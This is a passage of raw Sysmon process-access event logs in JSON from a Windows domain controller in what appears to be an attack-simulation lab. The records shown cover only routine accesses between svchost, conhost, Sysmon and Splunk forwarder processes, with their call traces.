C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.283","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6533,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.283\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.283","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6534,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.283\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.283","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6535,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.283\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.283","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6536,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.283\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.283","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6537,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.283\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.283","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6538,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.283\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.283","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6539,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.283\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1275-5F25-0000-0010A8520900}\r\nTargetProcessId: 2580\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.283","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1275-5F25-0000-0010A8520900}","TargetProcessId":"2580","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6540,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.423\r\nSourceProcessGUID: {E2A3D6B1-1275-5F25-0000-0010A8520900}\r\nSourceProcessId: 2580\r\nSourceThreadId: 3952\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.423","SourceProcessGUID":"{E2A3D6B1-1275-5F25-0000-0010A8520900}","SourceProcessId":"2580","SourceThreadId":"3952","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program 